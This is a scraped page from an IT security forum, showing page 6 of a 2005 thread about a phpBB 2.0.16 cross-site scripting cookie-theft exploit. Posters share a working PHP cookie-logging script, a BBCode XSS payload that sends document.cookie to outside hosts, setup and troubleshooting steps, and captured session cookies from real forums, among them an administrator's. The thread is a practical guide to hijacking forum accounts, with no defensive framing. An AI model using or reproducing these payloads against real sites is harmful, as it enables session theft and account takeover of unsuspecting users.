Waraxe IT Security Portal
Login or Register
November 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 83
Members: 0
Total: 83
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit Goto page Previous1, 2, 3, 4, 5, 6, 7, 8Next
Post new topicReply to topic View previous topic :: View next topic
PostPosted: Fri Jul 29, 2005 4:26 pm Reply with quote
diegocure15
Active user
Active user
Joined: Sep 22, 2004
Posts: 27




i just wrote about it!!!!!!
and some other people have, you just have to read dont be lazy!

this next code copy it and save it as cookie.php upload it thru yous ftp


Quote:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '<br>Cookie: '.$cookie.'</br> IP: ' .$ip. '<br> Date and Time: ' .$date. '</br> Referer: '.$referer.' ');
fclose($fp);
?>


Now open your notepad and create a file call steal.php with nothing in it just name the file steal.php and upload it thru your ftp too once its on your rooot next to cookies.php or on the same path right click on steal.php and attributes (CHMOOD) or something like that and give it 777 permision and thats it.

if you try it in a forum and the cookie does not show on your steal.php fiule is cuz that forum is not vul,hope you understand this time,seeya.
View user's profile Send private message
PostPosted: Fri Jul 29, 2005 5:36 pm Reply with quote
discordia
Beginner
Beginner
Joined: Jun 20, 2005
Posts: 2




diegocure15 wrote:
Armageddon85 wrote:
I perfectly understand the second part to this exploit - thanks to the video... but now i dont understand the first.

does the script go on a file in your website with chmod at 777?

if so does anyone know webhosting service for free that has that ability.

all the ones i have signed up for have a "quick and easy" file management system.


www.lycos.com and just have to upload the cookie script normally and the create a file with chmod on the same path and give it 777 mod.


I couldn't find what you speak of at Lycos, did you mean Angelfire? It lycos sponsor site?

At Angelfire, I cannot change the file permissions, it says the server does not support this. Are there any other free servers that do?


Last edited by discordia on Fri Jul 29, 2005 8:24 pm; edited 1 time in total
View user's profile Send private message
PostPosted: Fri Jul 29, 2005 7:24 pm Reply with quote
700G
Active user
Active user
Joined: Mar 25, 2005
Posts: 33




You can also just leave the URL as is "http://antichat.ru/cgi-bin/s.jpg" and then go to: "http://antichat.ru/sniff/log.php" to view your cookies.
View user's profile Send private message
PostPosted: Sun Jul 31, 2005 2:54 pm Reply with quote
Gandrasss
Beginner
Beginner
Joined: Jul 31, 2005
Posts: 2




In The Cookie.txt file i find this kode phpbb2mysql_data=a:0:{}; phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:1:\"8\";}; phpbb2mysql_sid=abfc72e6fa2af4238d4568560900beae; phpbb2mysql_t=a:1:{i:1681;i:1122816363;}
that is password
View user's profile Send private message
PostPosted: Mon Aug 01, 2005 8:35 am Reply with quote
OnlyMe
Beginner
Beginner
Joined: Aug 01, 2005
Posts: 1




not working for me..dot know..which is exact code is working..anyone assist me..sebzero..please? give me the code.

regards
View user's profile Send private message
chmod answer
PostPosted: Mon Aug 01, 2005 1:48 pm Reply with quote
Noob
Beginner
Beginner
Joined: Aug 01, 2005
Posts: 1




when your in whatever ftp program you wanna use, after you upload the pages you created to the Server Domain, refresh your screen and right click on the files you just ftp'd and you see a option for set attributes. You will want to make sure all options are checked giving the files permission to run as a program script ON the server. Setting CHMOD Permissions is basically telling the server what the files are and arent allowed to do on your domain. 777 by default gives the files permission to do everything possible.


[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://area51portal.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
View user's profile Send private message
PostPosted: Mon Aug 01, 2005 8:29 pm Reply with quote
Gandrasss
Beginner
Beginner
Joined: Jul 31, 2005
Posts: 2




that is password abfc72e6fa2af4238d4568560900beae
View user's profile Send private message
PostPosted: Tue Aug 02, 2005 1:09 pm Reply with quote
Umuxai
Beginner
Beginner
Joined: Aug 02, 2005
Posts: 2




Is it possible to steal the whole cookies.txt file form IE with this method? As far as I remember IE is protecting this file... but I can be wrong Very Happy
View user's profile Send private message
PostPosted: Tue Aug 02, 2005 3:01 pm Reply with quote
Beat
Beginner
Beginner
Joined: Jul 29, 2005
Posts: 4




Umuxai wrote:
Is it possible to steal the whole cookies.txt file form IE with this method? As far as I remember IE is protecting this file... but I can be wrong Very Happy

There is no such thing as "cookies.txt" with IE Very Happy
View user's profile Send private message
PostPosted: Wed Aug 03, 2005 2:02 pm Reply with quote
Umuxai
Beginner
Beginner
Joined: Aug 02, 2005
Posts: 2




Oh yes... you are right Smile I forgot about it...

Is there any possibility to find out what cookies have user in his browser?
View user's profile Send private message
PostPosted: Thu Aug 04, 2005 12:50 am Reply with quote
darkclaw
Regular user
Regular user
Joined: Aug 04, 2005
Posts: 14




Sorry, i dont know if i am doing something wrong, but my cookies.php is like this:
Quote:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>


I post a reply in the forum with this in the msg:
Quote:
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://darkclaw.ionichost.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'


I uploaded cookies.php and cookies.txt to server. Chmoded cookies.txt to 777. But my cookies.txt is like this:

Cookie:
IP: ???.???.???.???
Date and Time: 3 August, 2005, 9:42 pm
Referer: referer page here


There is nothing after Cookie: !!
What am i doing wrong ?
View user's profile Send private message
PostPosted: Thu Aug 04, 2005 4:23 am Reply with quote
diegocure15
Active user
Active user
Joined: Sep 22, 2004
Posts: 27




forum has been patched.
View user's profile Send private message
PostPosted: Fri Aug 05, 2005 1:31 pm Reply with quote
DI1
Beginner
Beginner
Joined: Aug 05, 2005
Posts: 2




I tried it on some forum with 2.0.16 and I got it worked for a normal user. but then I got the cookie from the admin, but it seems it doesn't have a password hash Confused


Code:
<br>Cookie: phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:1:\"3\";}; SamMar_forum_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";i:-1;}; SamMar_forum_sid=3944130a0e2ac0db92619a6c40b003d7</br> IP: 212.78.204.27<br> Date and Time: 5 August, 2005, 3:02 pm</br> Referer: http://www.checkedforum.com/forum/viewtopic.php?t=40&start=135 <br>Cookie: phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:1:\"3\";}; SamMar_forum_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:1:\"3\";}; SamMar_forum_sid=3944130a0e2ac0db92619a6c40b003d7; SamMar_forum_t=a:4:{i:1448;i:1123246990;i:1646;i:1123247028;i:1680;i:1123247054;i:39;i:1123247060;}</br> IP: ************<br> Date and Time: 5 August, 2005, 3:04 pm</br> Referer: http://www.checkedforum.com/forum/viewtopic.php?t=40&start=135
View user's profile Send private message
PostPosted: Fri Aug 05, 2005 4:17 pm Reply with quote
Beat
Beginner
Beginner
Joined: Jul 29, 2005
Posts: 4




diegocure15 wrote:
forum has been patched.
View user's profile Send private message
PostPosted: Fri Aug 05, 2005 4:44 pm Reply with quote
DI1
Beginner
Beginner
Joined: Aug 05, 2005
Posts: 2




but I can still hack normal users. for those users a hashfile is given.

and the forum is still 2.0.16
View user's profile Send private message
phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 6 of 8
Goto page Previous1, 2, 3, 4, 5, 6, 7, 8Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.038 Seconds